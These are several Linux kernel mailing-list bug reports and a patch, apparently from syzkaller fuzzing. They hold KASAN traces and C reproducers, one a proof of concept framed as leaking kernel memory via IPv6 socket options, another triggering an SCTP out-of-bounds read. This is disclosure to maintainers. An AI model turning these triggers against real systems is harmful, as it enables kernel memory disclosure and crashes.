./include/net/udp.h:203 [ 1921.980207] [] inet_release+0xed/0x1c0 net/ipv4/af_inet.c:415 [ 1921.980207] [] inet6_release+0x50/0x70 net/ipv6/af_inet6.c:422 [ 1921.980207] [] sock_release+0x8d/0x1d0 net/socket.c:570 [ 1921.980207] [] sock_close+0x16/0x20 net/socket.c:1017 [ 1921.980207] [] __fput+0x28c/0x780 fs/file_table.c:208 [ 1921.980207] [] fput+0x15/0x20 fs/file_table.c:244 [ 1921.980207] [] task_work_run+0xf9/0x170 [ 1921.980207] [] do_exit+0x85e/0x2a00 [ 1921.980207] [] do_group_exit+0x108/0x330 [ 1921.980207] [] get_signal+0x617/0x17a0 kernel/signal.c:2307 [ 1921.980207] [] do_signal+0x7f/0x18f0 [ 1921.980207] [] exit_to_usermode_loop+0xbf/0x150 arch/x86/entry/common.c:156 [ 1921.980207] [< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190 [ 1921.980207] [] syscall_return_slowpath+0x1a0/0x1e0 arch/x86/entry/common.c:259 [ 1921.980207] [] entry_SYSCALL_64_fastpath+0xc4/0xc6 Memory state around the buggy address: 88002f3fe080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 88002f3fe100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >88002f3fe180: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb ^ 88002f3fe200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 88002f3fe280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb Thansk && Best Regards, Baozeng Ding
BUG: KASAN: use-after-free in udp_lib_get_port
Hello all, While running syzkaller fuzzer I have got the following use-after-free bug in udp_lib_get_port. The kernel version is 4.8.0+ (on Oct 7 commit d1f5323370fceaed43a7ee38f4c7bfc7e70f28d0). Unfortunately I failed to find a reproducer for it. BUG: KASAN: use-after-free in udp_lib_get_port+0x1573/0x1860 at addr 88000804cb60 Write of size 8 by task syz-executor/31190 CPU: 0 PID: 31190 Comm: syz-executor Not tainted 4.8.0+ #39 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 880015ac7a48 829f835b 880032b531c0 88000804cb40 88000804d250 880017415a4a 880015ac7a70 8174d3cc 880015ac7b00 88000804cb00 880032b531c0 880015ac7af0 Call Trace: [] dump_stack+0xb3/0x118 lib/dump_stack.c:15 [] kasan_object_err+0x1c/0x70 mm/kasan/report.c:156 [< inline >] print_address_description mm/kasan/report.c:194 [] kasan_report_error+0x1f6/0x4d0 mm/kasan/report.c:283 [< inline >] kasan_report mm/kasan/report.c:303 [] __asan_report_store8_noabort+0x3e/0x40 mm/kasan/report.c:329 [< inline >] hlist_add_head_rcu ./include/linux/rculist.h:487 [] udp_lib_get_port+0x1573/0x1860 net/ipv4/udp.c:345 [] udp_v6_get_port+0xa7/0xd0 net/ipv6/udp.c:106 [] inet6_bind+0x89c/0xfb0 net/ipv6/af_inet6.c:384 [] SYSC_bind+0x1ea/0x250 net/socket.c:1367 [] SyS_bind+0x24/0x30 net/socket.c:1353 [] entry_SYSCALL_64_fastpath+0x23/0xc6 Object at 88000804cb40, in cache UDPv6 size: 1496 Allocated: PID = 30789 [ 378.305168] [] save_stack_trace+0x16/0x20 [ 378.305168] [] save_stack+0x46/0xd0 [ 378.305168] [] kasan_kmalloc+0xad/0xe0 [ 378.305168] [] kasan_slab_alloc+0x12/0x20 [ 378.305168] [< inline >] slab_post_alloc_hook mm/slab.h:417 [ 378.305168] [< inline >] slab_alloc_node mm/slub.c:2708 [ 378.305168] [< inline >] slab_alloc mm/slub.c:2716 [ 378.305168] [] kmem_cache_alloc+0xc8/0x2b0 mm/slub.c:2721 [ 378.305168] [] sk_prot_alloc+0x69/0x2b0 net/core/sock.c:1326 [ 378.305168] [] sk_alloc+0x38/0xae0 net/core/sock.c:1388 [ 378.305168] [] inet6_create+0x2d7/0x1000 net/ipv6/af_inet6.c:182 [ 378.305168] [] __sock_create+0x37b/0x640 net/socket.c:1153 [ 378.305168] [< inline >] sock_create net/socket.c:1193 [ 378.305168] [< inline >] SYSC_socket net/socket.c:1223 [ 378.305168] [] SyS_socket+0xef/0x1b0 net/socket.c:1203 [ 378.305168] [] entry_SYSCALL_64_fastpath+0x23/0xc6 Freed: PID = 30789 [ 378.305168] [] save_stack_trace+0x16/0x20 [ 378.305168] [] save_stack+0x46/0xd0 [ 378.305168] [] kasan_slab_free+0x71/0xb0 [ 378.305168] [< inline >] slab_free_hook mm/slub.c:1352 [ 378.305168] [< inline >] slab_free_freelist_hook mm/slub.c:1374 [ 378.305168] [< inline >] slab_free mm/slub.c:2951 [ 378.305168] [] kmem_cache_free+0xc8/0x330 mm/slub.c:2973 [ 378.305168] [< inline >] sk_prot_free net/core/sock.c:1369 [ 378.305168] [] __sk_destruct+0x32b/0x4f0 net/core/sock.c:1444 [ 378.305168] [] sk_destruct+0x44/0x80 net/core/sock.c:1452 [ 378.305168] [] __sk_free+0x53/0x220 net/core/sock.c:1460 [ 378.305168] [] sk_free+0x23/0x30 net/core/sock.c:1471 [ 378.305168] [] sk_common_release+0x28c/0x3e0 ./include/net/sock.h:1589 [ 378.305168] [] udp_lib_close+0x15/0x20 ./include/net/udp.h:203 [ 378.305168] [] inet_release+0xed/0x1c0 net/ipv4/af_inet.c:415 [ 378.305168] [] inet6_release+0x50/0x70 net/ipv6/af_inet6.c:422 [ 378.305168] [] sock_release+0x8d/0x1d0 net/socket.c:570 [ 378.305168] [] sock_close+0x16/0x20 net/socket.c:1017 [ 378.305168] [] __fput+0x28c/0x780 fs/file_table.c:208 [ 378.305168] [] fput+0x15/0x20 fs/file_table.c:244 [ 378.305168] [] task_work_run+0xf9/0x170 [ 378.305168] [] do_exit+0x85e/0x2a00 [ 378.305168] [] do_group_exit+0x108/0x330 [ 378.376437] [] get_signal+0x617/0x17a0 kernel/signal.c:2307 [ 378.376437] [] do_signal+0x7f/0x18f0 [ 378.376437] [] exit_to_usermode_loop+0xbf/0x150 arch/x86/entry/common.c:156 [ 378.376437] [< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190 [ 378.376437] [] syscall_return_slowpath+0x1a0/0x1e0 arch/x86/entry/common.c:259 [ 378.376437] [] entry_SYSCALL_64_fastpath+0xc4/0xc6 Memory state around the buggy address: 88000804ca00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 88000804ca80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >88000804cb00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb ^ 88000804cb80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 88000804cc00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ========== Thanks && Best Regards, Baozeng Ding
net/ipv6: potential deadlock in do_ipv6_setsockopt
Hello, While running syzkaller fuzzer I have got the following deadlock report. The kernel version is 4.8.0+ (on Oct 7 commit d1f5323370fceaed43a7ee38f4c7bfc7e70f28d0). Unfortunately I failed to find a reproducer for it. === [ INFO: possible circular locking dependency detected ] 4.8.0+ #39 Not tainted --- syz-executor/21301 is trying to acquire lock: ([ 165.136033] rtnl_mutex [] rtnl_lock+0x17/0x20 net/core/rtnetlink.c:70 but task is already holding lock: ([ 165.136033] sk_lock-AF_INET6 [] do_ipv6_setsockopt.isra.7+0x1f1/0x2960 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: : [ 165.136033] [] lock_acquire+0x1a8/0x380 kernel/locking/lockdep.c:3746 [ 165.136033] [] lock_sock_nested+0xcb/0x120 net/core/sock.c:2493 [ 165.136033] [] do_ipv6_setsockopt.isra.7+0x268/0x2960 [ 165.136033] [] ipv6_setsockopt+0x9b/0x140 [ 165.136033] [] udpv6_setsockopt+0x45/0x80 net/ipv6/udp.c:1344 [ 165.136033] [] sock_common_setsockopt+0x95/0xd0 net/core/sock.c:2688 [ 165.136033] [< inline >] SYSC_setsockopt net/socket.c:1742 [ 165.136033] [] SyS_setsockopt+0x158/0x240 net/socket.c:1721 [ 165.136033] [] entry_SYSCALL_64_fastpath+0x23/0xc6 : [ 165.136033] [< inline >] check_prev_add kernel/locking/lockdep.c:1829 [ 165.136033] [< inline >] check_prevs_add kernel/locking/lockdep.c:1939 [ 165.136033] [< inline >] validate_chain kernel/locking/lockdep.c:2266 [ 165.136033] [] __lock_acquire+0x35a9/0x4bc0 kernel/locking/lockdep.c:3335 [ 165.136033] [] lock_acquire+0x1a8/0x380 kernel/locking/lockdep.c:3746 [ 165.136033] [< inline >] __mutex_lock_common kernel/locking/mutex.c:521 [ 165.136033] [] mutex_lock_nested+0xb1/0x860 kernel/locking/mutex.c:621 [ 165.136033] [] rtnl_lock+0x17/0x20 net/core/rtnetlink.c:70 [ 165.136033] [] ipv6_sock_mc_close+0xfe/0x350 net/ipv6/mcast.c:288 [ 165.136033] [] do_ipv6_setsockopt.isra.7+0x22fc/0x2960 [ 165.136033] [] ipv6_setsockopt+0x9b/0x140 [ 165.136033] [] udpv6_setsockopt+0x45/0x80 net/ipv6/udp.c:1344 [ 165.136033] [] sock_common_setsockopt+0x95/0xd0 net/core/sock.c:2688 [ 165.136033] [< inline >] SYSC_setsockopt net/socket.c:1742 [ 165.136033] [] SyS_setsockopt+0x158/0x240 net/socket.c:1721 [ 165.136033] [] entry_SYSCALL_64_fastpath+0x23/0xc6 other info that might help us debug this: Possible unsafe locking scenario: CPU0CPU1 lock([ 165.136033] sk_lock-AF_INET6 ); lock([ 165.136033] rtnl_mutex ); lock([ 165.136033] sk_lock-AF_INET6 ); lock([ 165.136033] rtnl_mutex ); *** DEADLOCK *** 1 lock held by syz-executor/21301: #0: [ 165.136033] ( stack backtrace: CPU: 1 PID: 21301 Comm: syz-executor Not tainted 4.8.0+ #39 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 880017217580 829f835b 88d65790 88d65790 88dc6b70 880016f41fd8 8800172175d0 8141df18 880016f41ffa dc00 8764c180 880016f41fd8 Call Trace: [] dump_stack+0xb3/0x118 lib/dump_stack.c:15 [] print_circular_bug+0x288/0x340 kernel/locking/lockdep.c:1202 [< inline >] check_prev_add kernel/locking/lockdep.c:1829 [< inline >] check_prevs_add kernel/locking/lockdep.c:1939 [< inline >] validate_chain kernel/locking/lockdep.c:2266 [] __lock_acquire+0x35a9/0x4bc0 kernel/locking/lockdep.c:3335 [] lock_acquire+0x1a8/0x380 kernel/locking/lockdep.c:3746 [< inline >] __mutex_lock_common kernel/locking/mutex.c:521 [] mutex_lock_nested+0xb1/0x860 kernel/locking/mutex.c:621 [] rtnl_lock+0x17/0x20 net/core/rtnetlink.c:70 [] ipv6_sock_mc_close+0xfe/0x350 net/ipv6/mcast.c:288 [] do_ipv6_setsockopt.isra.7+0x22fc/0x2960 [] ipv6_setsockopt+0x9b/0x140 [] udpv6_setsockopt+0x45/0x80 net/ipv6/udp.c:1344 [] sock_common_setsockopt+0x95/0xd0 net/core/sock.c:2688 [< inline >] SYSC_setsockopt net/socket.c:1742 [] SyS_setsockopt+0x158/0x240 net/socket.c:1721 [] entry_SYSCALL_64_fastpath+0x23/0xc6 Thanks && Best Regards, Baozeng Ding
Re: net/sctp: BUG: KASAN: stack-out-of-bounds in memcmp
Hello Xin Long, On 2016/10/14 19:13, Xin Long wrote: > On Sat, Aug 20, 2016 at 3:51 PM, Baozeng Ding wrote: >> Hello all, >> The following program triggers stack-out-of-bounds in memcmp. The kernel >> version is 4.8.0-rc1+ (on Aug 13 commit >> 118253a593bd1c57de2d1193df1ccffe1abe745b). Thanks. > ... >> >> #define _GNU_SOURCE >> #include >> #include >> #include >> #include >> #include >> #include >> #include >> #include >> >> int main() >> { >> int fd; >> mmap((void *)0x2000ul, 0xff2000ul, 0x3ul, 0x32ul, -1, 0x0ul); >> fd = socket(AF_INET6, SOCK_STREAM, IPPROTO_SCTP); >> memcpy((void*)0x20f82f80, >> "\x0a\x00\xab\x12\x72\xd4\x19\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x85\xda\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", >> 128); >> bind(fd, (struct sockaddr*)0x20f82f80ul, 0x80ul); >> *(uint64_t*)0x202e1fc8 = (uint64_t)0x20f77f80; >> *(uint32_t*)0x202e1fd0 = (uint32_t)0x80; >> *(uint64_t*)0x202e1fd8 = (uint64_t)0x20f7dfe0; >> *(uint64_t*)0x202e1fe0 = (uint64_t)0x2; >> *(uint64_t*)0x202e1fe8 = (uint64_t)0x20f77000; >> *(uint64_t*)0x202e1ff0 = (uint64_t)0x3; >> *(uint32_t*)0x202e1ff8 = (uint32_t)0x80; >> memcpy((void*)0x20f77f80, >> "\x0a\x00\xab\x12\xb0\xb3\x20\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc2\xc2\x0b\xb2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", >> 128); >> *(uint64_t*)0x20f7dfe0 = (uint64_t)0x20f77fc5; >> *(uint64_t*)0x20f7dfe8 = (uint64_t)0x3b; >> *(uint64_t*)0x20f7dff0 = (uint64_t)0x20f77fac; >> *(uint64_t*)0x20f7dff8 = (uint64_t)0x54; >> memcpy((void*)0x20f77fc5, >> "\xa5\x7d\xf3\xc4\xfe\xd3\xfd\x44\x63\x00\x8c\x1e\x4c\x2e\x8d\x8d\x9a\x9c\x9c\x9d\x5b\x7c\xe1\x06\xf7\x15\x16\xed\x68\xd1\xfc\xf4\xa4\x3a\xe4\x69\x51\x16\x74\xf4\x1a\xcf\x0e\x99\xc3\xa3\x87\xe7\x81\x6c\x10\x78\x75\x17\x69\x9d\x11\x0c\xc7", >> 59); >> memcpy((void*)0x20f77fac, >> "\x86\x08\x89\x3c\xf3\x58\xea\xe7\x64\x6a\xfb\xb5\xe8\xdd\x5f\x69\xa5\xd4\xdc\xd9\xe7\x71\x95\x07\x78\x7b\x21\xda\x43\x9c\x62\x4d\xca\x64\xb5\x6e\x96\x55\xe9\x58\x76\x66\x1d\xb9\x7b\xe6\x20\xc1\xa9\xed\x70\xc1\x2b\x7c\x86\x8c\xba\x28\xb3\x2c\xb9\x64\xb7\x84\x65\x0d\x7f\xa6\x98\x6f\x49\xcb\x35\xad\x5a\xdf\x13\x75\x99\x57\x7e\xbb\x38\x89", >> 84); >> *(uint64_t*)0x20f77000 = (uint64_t)0x15; >> *(uint32_t*)0x20f77008 = (uint32_t)0x1; >> *(uint32_t*)0x20f7700c = (uint32_t)0xfffe; >> *(uint8_t*)0x20f77010 = (uint8_t)0xbb; >> *(uint8_t*)0x20f77011 = (uint8_t)0x2; >> *(uint8_t*)0x20f77012 = (uint8_t)0x5; >> *(uint8_t*)0x20f77013 = (uint8_t)0x2; >> *(uint8_t*)0x20f77014 = (uint8_t)0x8000; >> *(uint64_t*)0x20f77015 = (uint64_t)0x10; >> *(uint32_t*)0x20f7701d = (uint32_t)0x; >> *(uint32_t*)0x20f77021 = (uint32_t)0x1; >> *(uint64_t*)0x20f77025 = (uint64_t)0x13; >> *(uint32_t*)0x20f7702d = (uint32_t)0x6; >> *(uint32_t*)0x20f77031 = (uint32_t)0xfe00; >> *(uint8_t*)0x20f77035 = (uint8_t)0x8000; >> *(uint8_t*)0x20f77036 = (uint8_t)0xfff8; >> sendmmsg(fd, (struct mmsghdr *)0x202e1fc8ul, 0x1ul, 0x1ul); >> return 0; >> } >> > Hi, Baozeng, I couldn't reproduce this issue with this script, > even in 118253a593bd1c57de2d1193df1ccffe1abe745b > do I need to do some extra config for this ? > You need config KASAN. CONFIG_HAVE_ARCH_KASAN=y CONFIG_KASAN=y CONFIG_KASAN_INLINE=y CONFIG_KASAN_SHADOW_OFFSET=0xdc00 I justed tested with b67be92feb486f800d80d72c67fd87b47b79b18e(Octor 12), it sitll exits. If you still cannot reproduce it, i will send the .config to you privately. Thanks.
BUG: net/ipv6: kernel memory leak in ip6_datagram_recv_specific_ctl
Hi all, The following program triggers use-after-free in ip6_datagram_recv_specific_ctl, which may leak kernel memory. The kernel version is 4.8.0+ (on Oct 7 commit d1f5323370fceaed43a7ee38f4c7bfc7e70f28d0). == BUG: KASAN: use-after-free in ip6_datagram_recv_specific_ctl+0x13f1/0x15c0 at addr 880029c84ec8 Read of size 1 by task poc/25548 Call Trace: [] dump_stack+0x12e/0x185 /lib/dump_stack.c:15 [< inline >] print_address_description /mm/kasan/report.c:204 [] kasan_report_error+0x48b/0x4b0 /mm/kasan/report.c:283 [< inline >] kasan_report /mm/kasan/report.c:303 [] __asan_report_load1_noabort+0x3e/0x40 /mm/kasan/report.c:321 [] ip6_datagram_recv_specific_ctl+0x13f1/0x15c0 /net/ipv6/datagram.c:687 [] ip6_datagram_recv_ctl+0x33/0x40 [] do_ipv6_getsockopt.isra.4+0xaec/0x2150 [] ipv6_getsockopt+0x116/0x230 [] tcp_getsockopt+0x82/0xd0 /net/ipv4/tcp.c:3035 [] sock_common_getsockopt+0x95/0xd0 /net/core/sock.c:2647 [< inline >] SYSC_getsockopt /net/socket.c:1776 [] SyS_getsockopt+0x142/0x230 /net/socket.c:1758 [] entry_SYSCALL_64_fastpath+0x23/0xc6 Memory state around the buggy address: 880029c84d80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 880029c84e00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff > 880029c84e80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ^ 880029c84f00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 880029c84f80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff == #include #include #include #include #include #include #include #include #include #define IPV6_2292DSTOPTS4 #define IPV6_2292PKTOPTIONS 6 #define IPV6_FLOWINFO 11 int main() { int fd; int i, r; int opt = 1, len = 0; struct msghdr msg; struct sockaddr_in6 addr; int sub_addr[4]; struct iovec iov; memset(sub_addr, 0, sizeof(sub_addr)); sub_addr[3] = 0x100; memcpy(&addr.sin6_addr, sub_addr, sizeof(sub_addr)); addr.sin6_family = AF_INET6; addr.sin6_port = 0x10ab; addr.sin6_flowinfo = 0x1; addr.sin6_scope_id = 0; mmap(0x2000ul, 0x1c000ul, 0x3ul, 0x32ul, -1, 0x0ul, 0, 0, 0); memset(0x2000, 'a', 0x1c000); fd = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); bind(fd, &addr, sizeof(addr)); setsockopt(fd, IPPROTO_IPV6, IPV6_2292DSTOPTS, &opt, 4); setsockopt(fd, IPPROTO_IPV6, IPV6_FLOWINFO, &opt, 4); addr.sin6_flowinfo = 0; addr.sin6_scope_id = 0; msg.msg_name = &addr; msg.msg_namelen = sizeof(addr); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_iov->iov_base = 0x2000; msg.msg_iov->iov_len = 0x100; msg.msg_control = 0x2000; msg.msg_controllen = 0x100; msg.msg_flags = 0; r = sendmsg(fd, &msg, MSG_FASTOPEN); if (r < 0) { printf("sendmsg errno=%d\n", r); } r = getsockopt(fd, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, 0x20012000ul, &len); if (r < 0) printf("getsockopt error\n"); return 0; } The following lines case out-of-bounds read, which may leak kernel memory by put_cmsg. 686 u8 *ptr = nh + opt->dst0; // Out-of-bouds when opt->dst0 is large. 687 put_cmsg(msg, SOL_IPV6, IPV6_2292DSTOPTS, (ptr[1]+1)<<3, ptr); I debuged using printk and got some values of opt as the following, which may help locate the root cause of the bug. Thanks. [85564.842733] degug: opt->iif is 0xe111121c [85564.842737] degug: opt->ra is 0x121c [85564.842741] degug: opt->dst0 is 0xe111 Best Regards, Baozeng Ding
net/sctp: BUG: KASAN: stack-out-of-bounds in memcmp
0; memcpy((void*)0x20f77f80, "\x0a\x00\xab\x12\xb0\xb3\x20\x7b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc2\xc2\x0b\xb2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 128); *(uint64_t*)0x20f7dfe0 = (uint64_t)0x20f77fc5; *(uint64_t*)0x20f7dfe8 = (uint64_t)0x3b; *(uint64_t*)0x20f7dff0 = (uint64_t)0x20f77fac; *(uint64_t*)0x20f7dff8 = (uint64_t)0x54; memcpy((void*)0x20f77fc5, "\xa5\x7d\xf3\xc4\xfe\xd3\xfd\x44\x63\x00\x8c\x1e\x4c\x2e\x8d\x8d\x9a\x9c\x9c\x9d\x5b\x7c\xe1\x06\xf7\x15\x16\xed\x68\xd1\xfc\xf4\xa4\x3a\xe4\x69\x51\x16\x74\xf4\x1a\xcf\x0e\x99\xc3\xa3\x87\xe7\x81\x6c\x10\x78\x75\x17\x69\x9d\x11\x0c\xc7", 59); memcpy((void*)0x20f77fac, "\x86\x08\x89\x3c\xf3\x58\xea\xe7\x64\x6a\xfb\xb5\xe8\xdd\x5f\x69\xa5\xd4\xdc\xd9\xe7\x71\x95\x07\x78\x7b\x21\xda\x43\x9c\x62\x4d\xca\x64\xb5\x6e\x96\x55\xe9\x58\x76\x66\x1d\xb9\x7b\xe6\x20\xc1\xa9\xed\x70\xc1\x2b\x7c\x86\x8c\xba\x28\xb3\x2c\xb9\x64\xb7\x84\x65\x0d\x7f\xa6\x98\x6f\x49\xcb\x35\xad\x5a\xdf\x13\x75\x99\x57\x7e\xbb\x38\x89", 84); *(uint64_t*)0x20f77000 = (uint64_t)0x15; *(uint32_t*)0x20f77008 = (uint32_t)0x1; *(uint32_t*)0x20f7700c = (uint32_t)0xfffe; *(uint8_t*)0x20f77010 = (uint8_t)0xbb; *(uint8_t*)0x20f77011 = (uint8_t)0x2; *(uint8_t*)0x20f77012 = (uint8_t)0x5; *(uint8_t*)0x20f77013 = (uint8_t)0x2; *(uint8_t*)0x20f77014 = (uint8_t)0x8000; *(uint64_t*)0x20f77015 = (uint64_t)0x10; *(uint32_t*)0x20f7701d = (uint32_t)0x; *(uint32_t*)0x20f77021 = (uint32_t)0x1; *(uint64_t*)0x20f77025 = (uint64_t)0x13; *(uint32_t*)0x20f7702d = (uint32_t)0x6; *(uint32_t*)0x20f77031 = (uint32_t)0xfe00; *(uint8_t*)0x20f77035 = (uint8_t)0x8000; *(uint8_t*)0x20f77036 = (uint8_t)0xfff8; sendmmsg(fd, (struct mmsghdr *)0x202e1fc8ul, 0x1ul, 0x1ul); return 0; } Best Regards, Baozeng Ding
[PATCH] tipc: fix potential null pointer dereference in the nla_data function
Before calling the nla_data function, make sure the argument is not null. Fix potential null pointer dereference vulnerability for this. Signed-off-by: Baozeng Ding --- net/tipc/netlink_compat.c | 12 1 file changed, 12 insertions(+) diff --git a/net/tipc/netlink_compat.c b/net/tipc/netlink_compat.c index f795b1d..efbba26 100644 --- a/net/tipc/netlink_compat.c +++ b/net/tipc/netlink_compat.c @@ -356,6 +356,9 @@ static int tipc_nl_compat_bearer_dump(struct tipc_nl_compat_msg *msg, if (err) return err; + if (!bearer[TIPC_NLA_BEARER_NAME]) + return -EINVAL; + return tipc_add_tlv(msg->rep, TIPC_TLV_BEARER_NAME, nla_data(bearer[TIPC_NLA_BEARER_NAME]), nla_len(bearer[TIPC_NLA_BEARER_NAME])); @@ -492,6 +495,9 @@ static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, if (err) return err; + if (!link[TIPC_NLA_LINK_NAME]) + return -EINVAL; + name = (char *)TLV_DATA(msg->req); if (strcmp(name, nla_data(link[TIPC_NLA_LINK_NAME])) != 0) return 0; @@ -602,6 +608,9 @@ static int tipc_nl_compat_link_dump(struct tipc_nl_compat_msg *msg, if (err) return err; + if (!link[TIPC_NLA_LINK_NAME]) + return -EINVAL; + link_info.dest = nla_get_flag(link[TIPC_NLA_LINK_DEST]); link_info.up = htonl(nla_get_flag(link[TIPC_NLA_LINK_UP])); strcpy(link_info.str, nla_data(link[TIPC_NLA_LINK_NAME])); @@ -981,6 +990,9 @@ static int tipc_nl_compat_media_dump(struct tipc_nl_compat_msg *msg, if (err) return err; + if (!media[TIPC_NLA_MEDIA_NAME]) + return -EINVAL; + return tipc_add_tlv(msg->rep, TIPC_TLV_MEDIA_NAME, nla_data(media[TIPC_NLA_MEDIA_NAME]), nla_len(media[TIPC_NLA_MEDIA_NAME])); -- 1.9.1
Re: BUG: net/netlink: KASAN: use-after-free in netlink_sock_destruct
On 2016/5/26 23:06, Eric Dumazet wrote: > On Thu, 2016-05-26 at 22:48 +0800, Baozeng Ding wrote: >> Hi all, >> I've got the following report use-after-free in netlink_sock_destruct while >> running syzkaller. >> Unfortunately no reproducer.The kernel version is 4.6 (May 15, on commit >> 2dcd0af568b0cf583645c8a317dd12e344b1c72a). Thanks. >> >> == >> BUG: KASAN: use-after-free in kfree_skb+0x28c/0x310 at addr 880036c1179c >> Read of size 4 by task syz-executor/21618 >> = >> BUG skbuff_head_cache (Tainted: GW ): kasan: bad access detected >> - >> >> Disabling lock debugging due to kernel taint >> INFO: Slab 0xeadb0400 objects=25 used=3 fp=0x880036c116c0 >> flags=0x1fffc004080 >> INFO: Object 0x880036c11680 @offset=5760 fp=0x >> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS >> rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 >> 0002 88006da07c40 8295f5f1 88003e0fc5c0 >> 880036c11680 eadb0400 880036c1 88006da07c70 >> 8171144d 88003e0fc5c0 eadb0400 880036c11680 >> Call Trace: >> [< inline >] __dump_stack /lib/dump_stack.c:15 >> [] dump_stack+0xb3/0x112 /lib/dump_stack.c:51 >> [] print_trailer+0x10d/0x190 /mm/slub.c:667 >> [] object_err+0x2f/0x40 /mm/slub.c:674 >> [< inline >] print_address_description /mm/kasan/report.c:179 >> [] kasan_report_error+0x218/0x530 /mm/kasan/report.c:275 >> [] ? debug_check_no_locks_freed+0x290/0x290 >> /kernel/locking/lockdep.c:4212 >> [< inline >] kasan_report /mm/kasan/report.c:297 >> [] __asan_report_load4_noabort+0x3e/0x40 >> /mm/kasan/report.c:317 >> [< inline >] ? atomic_read /include/linux/compiler.h:222 >> [] ? kfree_skb+0x28c/0x310 /net/core/skbuff.c:699 >> [< inline >] atomic_read /include/linux/compiler.h:222 >> [] kfree_skb+0x28c/0x310 /net/core/skbuff.c:699 >> [] netlink_sock_destruct+0xeb/0x2b0 >> /net/netlink/af_netlink.c:334 >> [] ? __netlink_create+0x1d0/0x1d0 >> /net/netlink/af_netlink.c:577 >> [] sk_destruct+0x4a/0x4f0 /net/core/sock.c:1429 >> [] __sk_free+0x57/0x200 /net/core/sock.c:1459 >> [] sk_free+0x30/0x40 /net/core/sock.c:1470 >> [< inline >] sock_put /include/net/sock.h:1506 >> [] deferred_put_nlk_sk+0x34/0x40 >> /net/netlink/af_netlink.c:652 >> [< inline >] __rcu_reclaim /kernel/rcu/rcu.h:118 >> [< inline >] rcu_do_batch /kernel/rcu/tree.c:2681 >> [< inline >] invoke_rcu_callbacks /kernel/rcu/tree.c:2947 >> [< inline >] __rcu_process_callbacks /kernel/rcu/tree.c:2914 >> [] rcu_process_callbacks+0xa71/0x11d0 >> /kernel/rcu/tree.c:2931 >> [< inline >] ? __rcu_reclaim /kernel/rcu/rcu.h:108 >> [< inline >] ? rcu_do_batch /kernel/rcu/tree.c:2681 >> [< inline >] ? invoke_rcu_callbacks /kernel/rcu/tree.c:2947 >> [< inline >] ? __rcu_process_callbacks /kernel/rcu/tree.c:2914 >> [] ? rcu_process_callbacks+0xa1c/0x11d0 >> /kernel/rcu/tree.c:2931 >> [] ? __netlink_deliver_tap+0x7c0/0x7c0 >> /net/netlink/af_netlink.c:204 >> [] __do_softirq+0x22b/0x8da /kernel/softirq.c:273 >> [< inline >] invoke_softirq /kernel/softirq.c:350 >> [] irq_exit+0x15d/0x190 /kernel/softirq.c:391 >> [< inline >] exiting_irq /./arch/x86/include/asm/apic.h:658 >> [] smp_apic_timer_interrupt+0x7b/0xa0 >> /arch/x86/kernel/apic/apic.c:932 >> [] 